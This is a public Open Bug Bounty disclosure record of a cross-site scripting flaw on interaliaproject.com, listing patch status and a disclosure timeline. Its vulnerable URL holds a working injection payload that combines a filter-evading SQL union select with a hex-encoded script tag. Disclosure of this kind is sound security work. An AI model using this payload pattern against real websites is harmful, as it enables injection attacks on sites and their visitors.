interaliaproject.com XSS vulnerability

2016-09-27T20:29:00
ID OBB:183954
Type openbugbounty
Reporter f1she3
Modified 2017-07-28T11:33:00

Description

Vulnerable URL:
http://www.interaliaproject.com/news.php?id=-4%27%20/*!00000union%20select*/%201,2,0x3c7363726970743e616c65727428224f50454e425547424f554e545922293b3c2f7363726970743e,4,5,6--+
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 11:33 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3140467
VIP website status:| No
Check interaliaproject.com SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 September, 2016 20:29 GMT
Generic security notifications sent to website owner| 27 September, 2016 20:32 GMT
Notification sent to subscribers (without technical details)| 27 September, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 18 October, 2016 21:14 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:33 GMT